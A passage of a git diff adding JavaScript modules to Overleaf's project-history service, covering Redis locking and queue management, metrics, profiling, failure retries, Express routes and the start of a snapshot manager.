+    const lockLength = Date.now() - this.lockTakenAt
+    if (lockLength < MIN_LOCK_EXTENSION_INTERVAL) {
+      return async.setImmediate(callback)
+    }
+    return extendLock(this.key, this.value, error => {
+      if (error != null) {
+        return callback(OError.tag(error))
+      }
+      this.lockTakenAt = Date.now()
+      return callback()
+    })
+  }
+
+  release(callback) {
+    // The lock can expire in redis while the process carries on. This check
+    // logs when that happens.
+    const lockLength = Date.now() - this.lockTakenAt
+    if (lockLength > LOCK_TTL * 1000) {
+      metrics.inc('lock.project.exceeded_lock_timeout')
+      logger.debug('exceeded lock timeout', {
+        key: this.key,
+        slowExecutionError: this.slowExecutionError,
+      })
+    }
+
+    return releaseLock(this.key, this.value, error => {
+      this.timer.done()
+      if (error != null) {
+        return callback(OError.tag(error))
+      }
+      return callback()
+    })
+  }
+}
+
+/**
+ * Promisified version of runWithLock.
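+ *
+ * Usage sketch (hypothetical key and runner, shown for illustration only):
+ *
+ *   const result = await promises.runWithLock(
+ *     `ProjectHistoryLock:${projectId}`, // hypothetical key
+ *     async extendLock => {
+ *       await doSlowWork() // hypothetical long-running task
+ *       await extendLock() // refresh the TTL before it expires
+ *       return 'done'
+ *     }
+ *   )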
+ * + * @param {string} key + * @param {(extendLock: Function) => Promise<any>} runner + */ +async function runWithLockPromises(key, runner) { + const runnerCb = (extendLock, callback) => { + const extendLockPromises = promisify(extendLock) + runner(extendLockPromises) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) + } + + return await new Promise((resolve, reject) => { + runWithLock(key, runnerCb, (err, result) => { + if (err) { + reject(err) + } else { + resolve(result) + } + }) + }) +} + +export const promises = { + tryLock: promisify(tryLock), + extendLock: promisify(extendLock), + getLock: promisify(getLock), + checkLock: promisify(checkLock), + releaseLock: promisify(releaseLock), + runWithLock: runWithLockPromises, +} diff --git a/services/project-history/app/js/Metrics.js b/services/project-history/app/js/Metrics.js new file mode 100644 index 0000000..b515189 --- /dev/null +++ b/services/project-history/app/js/Metrics.js @@ -0,0 +1,15 @@ +// @ts-check + +import { prom } from '@overleaf/metrics' + +export const historyFlushDurationSeconds = new prom.Histogram({ + name: 'history_flush_duration_seconds', + help: 'Duration of a history flush in seconds', + buckets: [0.05, 0.1, 0.2, 0.3, 0.5, 1, 2, 5, 10], +}) + +export const historyFlushQueueSize = new prom.Histogram({ + name: 'history_flush_queue_size', + help: 'Size of the queue during history flushes', + buckets: prom.exponentialBuckets(1, 2, 10), +}) diff --git a/services/project-history/app/js/OperationsCompressor.js b/services/project-history/app/js/OperationsCompressor.js new file mode 100644 index 0000000..d14a4c8 --- /dev/null +++ b/services/project-history/app/js/OperationsCompressor.js @@ -0,0 +1,20 @@ +export function compressOperations(operations) { + if (!operations.length) return [] + + const newOperations = [] + let currentOperation = operations[0] + for (let operationId = 1; operationId < operations.length; operationId++) { + const nextOperation = operations[operationId] + if (currentOperation.canBeComposedWith(nextOperation)) { + currentOperation = currentOperation.compose(nextOperation) + } else { + // currentOperation and nextOperation cannot be composed. Push the + // currentOperation and start over with nextOperation. + newOperations.push(currentOperation) + currentOperation = nextOperation + } + } + newOperations.push(currentOperation) + + return newOperations +} diff --git a/services/project-history/app/js/Profiler.js b/services/project-history/app/js/Profiler.js new file mode 100644 index 0000000..9b10552 --- /dev/null +++ b/services/project-history/app/js/Profiler.js @@ -0,0 +1,80 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
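+//
+// Usage sketch (illustrative, not from the original file): time named steps
+// and emit per-step metrics; a breakdown is logged when the total exceeds
+// LOG_CUTOFF_TIME.
+//
+//   const profiler = new Profiler('flush', { projectId }) // hypothetical args
+//   doFirstStep() // hypothetical work
+//   profiler.log('first-step')
+//   doSecondStep()
+//   profiler.log('second-step')
+//   const totalMs = profiler.end()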
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' + +const LOG_CUTOFF_TIME = 1000 + +const deltaMs = function (ta, tb) { + const nanoSeconds = (ta[0] - tb[0]) * 1e9 + (ta[1] - tb[1]) + const milliSeconds = Math.floor(nanoSeconds * 1e-6) + return milliSeconds +} + +export class Profiler { + constructor(name, args) { + this.name = name + this.args = args + this.t0 = this.t = process.hrtime() + this.start = new Date() + this.updateTimes = [] + } + + log(label) { + const t1 = process.hrtime() + const dtMilliSec = deltaMs(t1, this.t) + this.t = t1 + this.updateTimes.push([label, dtMilliSec]) // timings in ms + return this // make it chainable + } + + end(message) { + const totalTime = deltaMs(this.t, this.t0) + // record the update times in metrics + for (const update of Array.from(this.updateTimes)) { + metrics.timing(`profile.${this.name}.${update[0]}`, update[1]) + } + if (totalTime > LOG_CUTOFF_TIME) { + // log anything greater than cutoff + const args = {} + for (const k in this.args) { + const v = this.args[k] + args[k] = v + } + args.updateTimes = this.updateTimes + args.start = this.start + args.end = new Date() + logger.debug(args, this.name) + } + return totalTime + } + + getTimeDelta() { + const lastIdx = this.updateTimes.length - 1 + if (lastIdx >= 0) { + return this.updateTimes[lastIdx][1] + } else { + return 0 + } + } + + wrap(label, fn) { + // create a wrapped function which calls profile.log(label) before continuing execution + const newFn = (...args) => { + this.log(label) + return fn(...Array.from(args || [])) + } + return newFn + } +} diff --git a/services/project-history/app/js/RedisManager.js b/services/project-history/app/js/RedisManager.js new file mode 100644 index 0000000..2f79a10 --- /dev/null +++ b/services/project-history/app/js/RedisManager.js @@ -0,0 +1,445 @@ +import { callbackify, promisify } from 'node:util' +import { setTimeout } from 'node:timers/promises' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' + +/** + * Maximum size taken from the redis queue, to prevent project history + * consuming unbounded amounts of memory + */ +export const RAW_UPDATE_SIZE_THRESHOLD = 4 * 1024 * 1024 + +/** + * Batch size when reading updates from Redis + */ +export const RAW_UPDATES_BATCH_SIZE = 50 + +/** + * Maximum length of ops (insertion and deletions) to process in a single + * iteration + */ +export const MAX_UPDATE_OP_LENGTH = 1024 + +/** + * Warn if we exceed this raw update size, the final compressed updates we + * send could be smaller than this + */ +const WARN_RAW_UPDATE_SIZE = 1024 * 1024 + +/** + * Maximum number of new docs to process in a single iteration + */ +export const MAX_NEW_DOC_CONTENT_COUNT = 32 + +const CACHE_TTL_IN_SECONDS = 3600 + +const Keys = Settings.redis.project_history.key_schema +const rclient = redis.createClient(Settings.redis.project_history) + +async function countUnprocessedUpdates(projectId) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + const updates = await rclient.llen(key) + return 
updates
+}
+
+async function* getRawUpdates(projectId) {
+  const key = Keys.projectHistoryOps({ project_id: projectId })
+  let start = 0
+  while (true) {
+    const stop = start + RAW_UPDATES_BATCH_SIZE - 1
+    const updates = await rclient.lrange(key, start, stop)
+    for (const update of updates) {
+      yield update
+    }
+    if (updates.length < RAW_UPDATES_BATCH_SIZE) {
+      return
+    }
+    start += RAW_UPDATES_BATCH_SIZE
+  }
+}
+
+async function getRawUpdatesBatch(projectId, batchSize) {
+  const rawUpdates = []
+  let totalRawUpdatesSize = 0
+  let hasMore = false
+  for await (const rawUpdate of getRawUpdates(projectId)) {
+    totalRawUpdatesSize += rawUpdate.length
+    if (
+      rawUpdates.length > 0 &&
+      totalRawUpdatesSize > RAW_UPDATE_SIZE_THRESHOLD
+    ) {
+      hasMore = true
+      break
+    }
+    rawUpdates.push(rawUpdate)
+    if (rawUpdates.length >= batchSize) {
+      hasMore = true
+      break
+    }
+  }
+  metrics.timing('redis.incoming.bytes', totalRawUpdatesSize, 1)
+  if (totalRawUpdatesSize > WARN_RAW_UPDATE_SIZE) {
+    const rawUpdateSizes = rawUpdates.map(rawUpdate => rawUpdate.length)
+    logger.warn(
+      {
+        projectId,
+        totalRawUpdatesSize,
+        rawUpdateSizes,
+      },
+      'large raw update size'
+    )
+  }
+  return { rawUpdates, hasMore }
+}
+
+export function parseDocUpdates(jsonUpdates) {
+  return jsonUpdates.map(update => JSON.parse(update))
+}
+
+async function getUpdatesInBatches(projectId, batchSize, runner) {
+  let moreBatches = true
+  while (moreBatches) {
+    const redisBatch = await getRawUpdatesBatch(projectId, batchSize)
+    if (redisBatch.rawUpdates.length === 0) {
+      break
+    }
+    moreBatches = redisBatch.hasMore
+
+    const rawUpdates = []
+    const updates = []
+    let totalOpLength = 0
+    let totalDocContentCount = 0
+    for (const rawUpdate of redisBatch.rawUpdates) {
+      let update
+      try {
+        update = JSON.parse(rawUpdate)
+      } catch (error) {
+        throw OError.tag(error, 'failed to parse update', {
+          projectId,
+          rawUpdate,
+        })
+      }
+
+      totalOpLength += update?.op?.length || 1
+      if (update.resyncDocContent) {
+        totalDocContentCount += 1
+      }
+
+      if (
+        updates.length > 0 &&
+        (totalOpLength > MAX_UPDATE_OP_LENGTH ||
+          totalDocContentCount > MAX_NEW_DOC_CONTENT_COUNT)
+      ) {
+        moreBatches = true
+        break
+      }
+      if (update.resyncProjectStructureOnly) {
+        update._raw = rawUpdate
+      }
+
+      rawUpdates.push(rawUpdate)
+      updates.push(update)
+    }
+
+    await runner(updates)
+    await deleteAppliedDocUpdates(projectId, rawUpdates)
+
+    if (batchSize === 1) {
+      // Special case for single stepping, don't process more batches
+      break
+    }
+  }
+}
+
+/**
+ * @param {string} projectId
+ * @param {ResyncProjectStructureUpdate} update
+ * @return {Promise<void>}
+ */
+async function deleteAppliedDocUpdate(projectId, update) {
+  const raw = update._raw
+  // Delete the first occurrence of the update with LREM KEY COUNT
+  // VALUE by setting COUNT to 1 which 'removes COUNT elements equal to
+  // value moving from head to tail.'
+  //
+  // If COUNT is 0 the entire list would be searched which would block
+  // redis since it would be an O(N) operation where N is the length of
+  // the queue.
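+  //
+  // Illustrative command (the exact key name comes from the configured key
+  // schema): LREM ProjectHistory:Ops:{<projectId>} 1 '<raw update JSON>'
+  // returns 1 when the matching entry was found and removed.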
+  metrics.summary('redis.projectHistoryOps', raw.length, {
+    status: 'lrem',
+  })
+  await rclient.lrem(Keys.projectHistoryOps({ project_id: projectId }), 1, raw)
+}
+
+async function deleteAppliedDocUpdates(projectId, updates) {
+  const multi = rclient.multi()
+  // Delete all the updates which have been applied (exact match)
+  for (const update of updates) {
+    // Delete the first occurrence of the update with LREM KEY COUNT
+    // VALUE by setting COUNT to 1 which 'removes COUNT elements equal to
+    // value moving from head to tail.'
+    //
+    // If COUNT is 0 the entire list would be searched which would block
+    // redis since it would be an O(N) operation where N is the length of
+    // the queue, in a multi of the batch size.
+    metrics.summary('redis.projectHistoryOps', update.length, {
+      status: 'lrem',
+    })
+    multi.lrem(Keys.projectHistoryOps({ project_id: projectId }), 1, update)
+  }
+  if (updates.length > 0) {
+    multi.del(Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }))
+  }
+  await multi.exec()
+}
+
+/**
+ * Deletes the entire queue - use with caution
+ */
+async function destroyDocUpdatesQueue(projectId) {
+  await rclient.del(
+    Keys.projectHistoryOps({ project_id: projectId }),
+    Keys.projectHistoryFirstOpTimestamp({ project_id: projectId })
+  )
+}
+
+/**
+ * Iterate over keys asynchronously using redis scan (non-blocking)
+ *
+ * Handles all the cluster nodes, or a single redis server
+ */
+async function _getKeys(pattern, limit) {
+  const nodes = rclient.nodes?.('master') || [rclient]
+  const keysByNode = []
+  for (const node of nodes) {
+    const keys = await _getKeysFromNode(node, pattern, limit)
+    keysByNode.push(keys)
+  }
+  return [].concat(...keysByNode)
+}
+
+async function _getKeysFromNode(node, pattern, limit) {
+  let cursor = 0 // redis iterator
+  const keySet = new Set() // avoid duplicate results
+  const batchSize = limit != null ?
Math.min(limit, 1000) : 1000 + + // scan over all keys looking for pattern + while (true) { + const reply = await node.scan(cursor, 'MATCH', pattern, 'COUNT', batchSize) + const [newCursor, keys] = reply + cursor = newCursor + + for (const key of keys) { + keySet.add(key) + } + + const noResults = cursor === '0' // redis returns string results not numeric + const limitReached = limit != null && keySet.size >= limit + if (noResults || limitReached) { + return Array.from(keySet) + } + + // avoid hitting redis too hard + await setTimeout(10) + } +} + +/** + * Extract ids from keys like DocsWithHistoryOps:57fd0b1f53a8396d22b2c24b + * or DocsWithHistoryOps:{57fd0b1f53a8396d22b2c24b} (for redis cluster) + */ +function _extractIds(keyList) { + return keyList.map(key => { + const m = key.match(/:\{?([0-9a-f]{24})\}?/) // extract object id + return m[1] + }) +} + +async function getProjectIdsWithHistoryOps(limit) { + const projectKeys = await _getKeys( + Keys.projectHistoryOps({ project_id: '*' }), + limit + ) + const projectIds = _extractIds(projectKeys) + return projectIds +} + +async function getProjectIdsWithHistoryOpsCount() { + const projectIds = await getProjectIdsWithHistoryOps() + const queuedProjectsCount = projectIds.length + metrics.globalGauge('queued-projects', queuedProjectsCount) + return queuedProjectsCount +} + +async function setFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + // store current time as an integer (string) + await rclient.setnx(key, Date.now()) +} + +async function getFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + const result = await rclient.get(key) + + // convert stored time back to a numeric timestamp + const timestamp = parseInt(result, 10) + + // check for invalid timestamp + if (isNaN(timestamp)) { + return null + } + + // convert numeric timestamp to a date object + const firstOpTimestamp = new Date(timestamp) + + return firstOpTimestamp +} + +async function getFirstOpTimestamps(projectIds) { + const keys = projectIds.map(projectId => + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + ) + const results = await rclient.mget(keys) + const timestamps = results.map(result => { + // convert stored time back to a numeric timestamp + const timestamp = parseInt(result, 10) + + // check for invalid timestamp + if (isNaN(timestamp)) { + return null + } + + // convert numeric timestamp to a date object + return new Date(timestamp) + }) + return timestamps +} + +async function clearFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + await rclient.del(key) +} + +async function getProjectIdsWithFirstOpTimestamps(limit) { + const projectKeys = await _getKeys( + Keys.projectHistoryFirstOpTimestamp({ project_id: '*' }), + limit + ) + const projectIds = _extractIds(projectKeys) + return projectIds +} + +async function clearDanglingFirstOpTimestamp(projectId) { + const count = await rclient.exists( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + Keys.projectHistoryOps({ project_id: projectId }) + ) + if (count === 2 || count === 0) { + // both (or neither) keys are present, so don't delete the timestamp + return 0 + } + // only one key is present, which makes this a dangling record, + // so delete the timestamp + const cleared = await rclient.del( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + ) + return cleared +} + +async function 
getCachedHistoryId(projectId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + const historyId = await rclient.get(key) + return historyId +} + +async function setCachedHistoryId(projectId, historyId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + await rclient.setex(key, CACHE_TTL_IN_SECONDS, historyId) +} + +async function clearCachedHistoryId(projectId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + await rclient.del(key) +} + +// EXPORTS + +const countUnprocessedUpdatesCb = callbackify(countUnprocessedUpdates) +const getRawUpdatesBatchCb = callbackify(getRawUpdatesBatch) +const deleteAppliedDocUpdatesCb = callbackify(deleteAppliedDocUpdates) +const destroyDocUpdatesQueueCb = callbackify(destroyDocUpdatesQueue) +const getProjectIdsWithHistoryOpsCb = callbackify(getProjectIdsWithHistoryOps) +const getProjectIdsWithHistoryOpsCountCb = callbackify( + getProjectIdsWithHistoryOpsCount +) +const setFirstOpTimestampCb = callbackify(setFirstOpTimestamp) +const getFirstOpTimestampCb = callbackify(getFirstOpTimestamp) +const getFirstOpTimestampsCb = callbackify(getFirstOpTimestamps) +const clearFirstOpTimestampCb = callbackify(clearFirstOpTimestamp) +const getProjectIdsWithFirstOpTimestampsCb = callbackify( + getProjectIdsWithFirstOpTimestamps +) +const clearDanglingFirstOpTimestampCb = callbackify( + clearDanglingFirstOpTimestamp +) +const getCachedHistoryIdCb = callbackify(getCachedHistoryId) +const setCachedHistoryIdCb = callbackify(setCachedHistoryId) +const clearCachedHistoryIdCb = callbackify(clearCachedHistoryId) + +const getUpdatesInBatchesCb = function ( + projectId, + batchSize, + runner, + callback +) { + const runnerPromises = promisify(runner) + getUpdatesInBatches(projectId, batchSize, runnerPromises) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) +} + +export { + countUnprocessedUpdatesCb as countUnprocessedUpdates, + getRawUpdatesBatchCb as getRawUpdatesBatch, + deleteAppliedDocUpdatesCb as deleteAppliedDocUpdates, + destroyDocUpdatesQueueCb as destroyDocUpdatesQueue, + getUpdatesInBatchesCb as getUpdatesInBatches, + getProjectIdsWithHistoryOpsCb as getProjectIdsWithHistoryOps, + getProjectIdsWithHistoryOpsCountCb as getProjectIdsWithHistoryOpsCount, + setFirstOpTimestampCb as setFirstOpTimestamp, + getFirstOpTimestampCb as getFirstOpTimestamp, + getFirstOpTimestampsCb as getFirstOpTimestamps, + clearFirstOpTimestampCb as clearFirstOpTimestamp, + getProjectIdsWithFirstOpTimestampsCb as getProjectIdsWithFirstOpTimestamps, + clearDanglingFirstOpTimestampCb as clearDanglingFirstOpTimestamp, + getCachedHistoryIdCb as getCachedHistoryId, + setCachedHistoryIdCb as setCachedHistoryId, + clearCachedHistoryIdCb as clearCachedHistoryId, +} + +export const promises = { + countUnprocessedUpdates, + getRawUpdatesBatch, + deleteAppliedDocUpdates, + deleteAppliedDocUpdate, + destroyDocUpdatesQueue, + getUpdatesInBatches, + getProjectIdsWithHistoryOps, + getProjectIdsWithHistoryOpsCount, + setFirstOpTimestamp, + getFirstOpTimestamp, + getFirstOpTimestamps, + clearFirstOpTimestamp, + getProjectIdsWithFirstOpTimestamps, + clearDanglingFirstOpTimestamp, + getCachedHistoryId, + setCachedHistoryId, + clearCachedHistoryId, +} diff --git a/services/project-history/app/js/RetryManager.js b/services/project-history/app/js/RetryManager.js new file mode 100644 index 0000000..b146da2 --- /dev/null +++ b/services/project-history/app/js/RetryManager.js @@ -0,0 +1,194 @@ 
+import _ from 'lodash' +import { promisify, callbackify } from 'node:util' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as SyncManager from './SyncManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as RedisManager from './RedisManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' + +const sleep = promisify(setTimeout) + +const TEMPORARY_FAILURES = [ + 'Error: ENOSPC: no space left on device, write', + 'Error: ESOCKETTIMEDOUT', + 'Error: failed to extend lock', + 'Error: tried to release timed out lock', + 'Error: Timeout', +] + +const HARD_FAILURES = [ + 'Error: history store a non-success status code: 422', + 'OError: history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + 'OpsOutOfOrderError: project structure version out of order on incoming updates', + 'OpsOutOfOrderError: doc version out of order', + 'OpsOutOfOrderError: doc version out of order on incoming updates', +] + +const MAX_RESYNC_ATTEMPTS = 2 +const MAX_SOFT_RESYNC_ATTEMPTS = 1 + +export const promises = {} + +promises.retryFailures = async (options = {}) => { + const { failureType, timeout, limit } = options + if (failureType === 'soft') { + const batch = await getFailureBatch(softErrorSelector, limit) + const result = await retryFailureBatch(batch, timeout, async failure => { + await UpdatesProcessor.promises.processUpdatesForProject( + failure.project_id + ) + }) + return result + } else if (failureType === 'hard') { + const batch = await getFailureBatch(hardErrorSelector, limit) + const result = await retryFailureBatch(batch, timeout, async failure => { + await resyncProject(failure.project_id, { + hard: failureRequiresHardResync(failure), + }) + }) + return result + } +} + +export const retryFailures = callbackify(promises.retryFailures) + +function softErrorSelector(failure) { + return ( + (isTemporaryFailure(failure) && !isRepeatedFailure(failure)) || + (isFirstFailure(failure) && !isHardFailure(failure)) + ) +} + +function hardErrorSelector(failure) { + return ( + (isHardFailure(failure) || isRepeatedFailure(failure)) && + !isStuckFailure(failure) + ) +} + +function isTemporaryFailure(failure) { + return TEMPORARY_FAILURES.includes(failure.error) +} + +export function isHardFailure(failure) { + return HARD_FAILURES.includes(failure.error) +} + +export function isFirstFailure(failure) { + return failure.attempts <= 1 +} + +function isRepeatedFailure(failure) { + return failure.attempts > 3 +} + +function isStuckFailure(failure) { + return ( + failure.resyncAttempts != null && + failure.resyncAttempts >= MAX_RESYNC_ATTEMPTS + ) +} + +function failureRequiresHardResync(failure) { + return ( + failure.resyncAttempts != null && + failure.resyncAttempts >= MAX_SOFT_RESYNC_ATTEMPTS + ) +} + +async function getFailureBatch(selector, limit) { + let failures = await ErrorRecorder.promises.getFailedProjects() + failures = failures.filter(selector) + // randomise order + failures = _.shuffle(failures) + + // put a limit on the number to retry + const projectsToRetryCount = failures.length + if (limit && projectsToRetryCount > limit) { + failures = failures.slice(0, limit) + } + logger.debug({ projectsToRetryCount, limit }, 'retrying failed projects') + return failures +} + +async function retryFailureBatch(failures, timeout, retryHandler) { + const startTime = new Date() + + // keep track of successes and failures + const failed = [] + 
const succeeded = []
+  for (const failure of failures) {
+    const projectId = failure.project_id
+    const timeTaken = new Date() - startTime
+    if (timeout && timeTaken > timeout) {
+      // finish early due to timeout
+      logger.debug('background retries timed out')
+      break
+    }
+    logger.debug(
+      { projectId, timeTaken },
+      'retrying failed project in background'
+    )
+    try {
+      await retryHandler(failure)
+      succeeded.push(projectId)
+    } catch (err) {
+      failed.push(projectId)
+    }
+  }
+  return { succeeded, failed }
+}
+
+async function resyncProject(projectId, options = {}) {
+  const { hard = false } = options
+  try {
+    if (!/^[0-9a-f]{24}$/.test(projectId)) {
+      logger.debug({ projectId }, 'clearing bad project id')
+      await ErrorRecorder.promises.clearError(projectId)
+      return
+    }
+
+    await checkProjectHasHistoryId(projectId)
+    if (hard) {
+      await SyncManager.promises.startHardResync(projectId)
+    } else {
+      await SyncManager.promises.startResync(projectId)
+    }
+    await waitUntilRedisQueueIsEmpty(projectId)
+    await checkFailureRecordWasRemoved(projectId)
+  } catch (err) {
+    throw new OError('failed to resync project', {
+      projectId,
+      hard,
+    }).withCause(err)
+  }
+}
+
+async function checkProjectHasHistoryId(projectId) {
+  const historyId = await WebApiManager.promises.getHistoryId(projectId)
+  if (historyId == null) {
+    throw new OError('no history id')
+  }
+}
+
+async function waitUntilRedisQueueIsEmpty(projectId) {
+  for (let attempts = 0; attempts < 30; attempts++) {
+    const updatesCount =
+      await RedisManager.promises.countUnprocessedUpdates(projectId)
+    if (updatesCount === 0) {
+      return
+    }
+    await sleep(1000)
+  }
+  throw new OError('queue not empty')
+}
+
+async function checkFailureRecordWasRemoved(projectId) {
+  const failureRecord = await ErrorRecorder.promises.getFailureRecord(projectId)
+  if (failureRecord) {
+    throw new OError('failure record still exists')
+  }
+}
diff --git a/services/project-history/app/js/Router.js b/services/project-history/app/js/Router.js
new file mode 100644
index 0000000..ec9a4f0
--- /dev/null
+++ b/services/project-history/app/js/Router.js
@@ -0,0 +1,250 @@
+import OError from '@overleaf/o-error'
+import * as HttpController from './HttpController.js'
+import { Joi, validate } from './Validation.js'
+
+export function initialize(app) {
+  app.use(
+    validate({
+      params: Joi.object({
+        project_id: Joi.string().regex(/^[0-9a-f]{24}$/),
+        user_id: Joi.string().regex(/^[0-9a-f]{24}$/),
+        label_id: Joi.string().regex(/^[0-9a-f]{24}$/),
+        version: Joi.number().integer(),
+      }),
+    })
+  )
+
+  // use an extended timeout on all endpoints, to allow for long requests to history-v1
+  app.use(longerTimeout)
+
+  app.post('/project', HttpController.initializeProject)
+
+  app.delete('/project/:project_id', HttpController.deleteProject)
+
+  app.get('/project/:project_id/snapshot', HttpController.getLatestSnapshot)
+
+  app.get(
+    '/project/:project_id/diff',
+    validate({
+      query: {
+        pathname: Joi.string().required(),
+        from: Joi.number().integer().required(),
+        to: Joi.number().integer().required(),
+      },
+    }),
+    HttpController.getDiff
+  )
+
+  app.get(
+    '/project/:project_id/filetree/diff',
+    validate({
+      query: {
+        from: Joi.number().integer().required(),
+        to: Joi.number().integer().required(),
+      },
+    }),
+    HttpController.getFileTreeDiff
+  )
+
+  app.get(
+    '/project/:project_id/updates',
+    validate({
+      query: {
+        before: Joi.number().integer(),
+        min_count: Joi.number().integer(),
+      },
+    }),
+    HttpController.getUpdates
+  )
+
+  app.get(
'/project/:project_id/changes-in-chunk', + validate({ + query: { + since: Joi.number().integer().min(0), + }, + }), + HttpController.getChangesInChunkSince + ) + + app.get('/project/:project_id/version', HttpController.latestVersion) + + app.post( + '/project/:project_id/flush', + validate({ + query: { + debug: Joi.boolean().default(false), + bisect: Joi.boolean().default(false), + }, + }), + HttpController.flushProject + ) + + app.post( + '/project/:project_id/resync', + validate({ + query: { + force: Joi.boolean().default(false), + }, + body: { + force: Joi.boolean().default(false), + origin: Joi.object({ + kind: Joi.string().required(), + }), + historyRangesMigration: Joi.string() + .optional() + .valid('forwards', 'backwards'), + }, + }), + HttpController.resyncProject + ) + + app.get( + '/project/:project_id/dump', + validate({ + query: { + count: Joi.number().integer(), + }, + }), + HttpController.dumpProject + ) + + app.get('/project/:project_id/labels', HttpController.getLabels) + + app.post( + '/project/:project_id/labels', + validate({ + body: { + version: Joi.number().integer().required(), + comment: Joi.string().required(), + created_at: Joi.string(), + validate_exists: Joi.boolean().default(true), + user_id: Joi.string().allow(null), + }, + }), + + HttpController.createLabel + ) + + app.delete( + '/project/:project_id/user/:user_id/labels/:label_id', + validate({ + params: Joi.object({ + project_id: Joi.string().regex(/^[0-9a-f]{24}$/), + user_id: Joi.string().regex(/^[0-9a-f]{24}$/), + label_id: Joi.string().regex(/^[0-9a-f]{24}$/), + }), + }), + HttpController.deleteLabelForUser + ) + + app.delete( + '/project/:project_id/labels/:label_id', + validate({ + params: Joi.object({ + project_id: Joi.string().regex(/^[0-9a-f]{24}$/), + label_id: Joi.string().regex(/^[0-9a-f]{24}$/), + }), + }), + HttpController.deleteLabel + ) + + app.post( + '/user/:from_user/labels/transfer/:to_user', + HttpController.transferLabels + ) + + app.get( + '/project/:project_id/version/:version/:pathname', + HttpController.getFileSnapshot + ) + + app.get( + '/project/:project_id/ranges/version/:version/:pathname', + HttpController.getRangesSnapshot + ) + + app.get( + '/project/:project_id/metadata/version/:version/:pathname', + HttpController.getFileMetadataSnapshot + ) + + app.get( + '/project/:project_id/version/:version', + HttpController.getProjectSnapshot + ) + + app.get( + '/project/:project_id/paths/version/:version', + HttpController.getPathsAtVersion + ) + + app.post( + '/project/:project_id/force', + validate({ + query: { + clear: Joi.boolean().default(false), + }, + }), + HttpController.forceDebugProject + ) + + app.get('/project/:history_id/blob/:hash', HttpController.getProjectBlob) + + app.get('/status/failures', HttpController.getFailures) + + app.get('/status/queue', HttpController.getQueueCounts) + + app.post( + '/retry/failures', + validate({ + query: { + failureType: Joi.string().valid('soft', 'hard'), + // bail out after this time limit + timeout: Joi.number().integer().default(300), + // maximum number of projects to check + limit: Joi.number().integer().default(100), + callbackUrl: Joi.string(), + }, + }), + HttpController.retryFailures + ) + + app.post( + '/flush/old', + validate({ + query: { + // flush projects with queued ops older than this + maxAge: Joi.number() + .integer() + .default(6 * 3600), + // pause this amount of time between checking queues + queueDelay: Joi.number().integer().default(100), + // maximum number of queues to check + limit: 
Joi.number().integer().default(1000), + // maximum amount of time allowed + timeout: Joi.number() + .integer() + .default(60 * 1000), + // whether to run in the background + background: Joi.boolean().falsy('0').truthy('1').default(false), + }, + }), + HttpController.flushOld + ) + + app.get('/status', (req, res, next) => res.send('project-history is up')) + + app.get('/oops', function (req, res, next) { + throw new OError('dummy test error') + }) + + app.get('/check_lock', HttpController.checkLock) + + app.get('/health_check', HttpController.healthCheck) +} + +function longerTimeout(req, res, next) { + res.setTimeout(6 * 60 * 1000) + next() +} diff --git a/services/project-history/app/js/SnapshotManager.js b/services/project-history/app/js/SnapshotManager.js new file mode 100644 index 0000000..ed31674 --- /dev/null +++ b/services/project-history/app/js/SnapshotManager.js @@ -0,0 +1,426 @@ +// @ts-check + +import { callbackify } from 'node:util' +import Core from 'overleaf-editor-core' +import { Readable as StringStream } from 'node:stream' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as Errors from './Errors.js' +import _ from 'lodash' + +/** + * @import { Snapshot } from 'overleaf-editor-core' + * @import { RangesSnapshot } from './types' + */ + +StringStream.prototype._read = function () {} + +const MAX_REQUESTS = 4 // maximum number of parallel requests to v1 history service + +/** + * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + */ +async function getFileSnapshotStream(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + + const file = snapshot.getFile(pathname) + if (file == null) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + + const historyId = await WebApiManager.promises.getHistoryId(projectId) + if (file.isEditable()) { + await file.load('eager', HistoryStoreManager.getBlobStore(historyId)) + const stream = new StringStream() + stream.push(file.getContent({ filterTrackedDeletes: true })) + stream.push(null) + return stream + } else { + return await HistoryStoreManager.promises.getProjectBlobStream( + historyId, + file.getHash() + ) + } +} + +/** + * Constructs a snapshot of the ranges in a document-updater compatible format. + * Positions will be relative to a document where tracked deletes have been + * removed from the string. This also means that if a tracked delete overlaps + * a comment range, the comment range will be truncated. 
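+ *
+ * Worked example (illustrative): for file content "abcdef" where "cd" is a
+ * tracked deletion, a comment spanning "bcde" comes back as { p: 1, c: 'be' },
+ * i.e. positions refer to the text with the deletion removed ("abef") and the
+ * deleted characters are dropped from the comment content.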
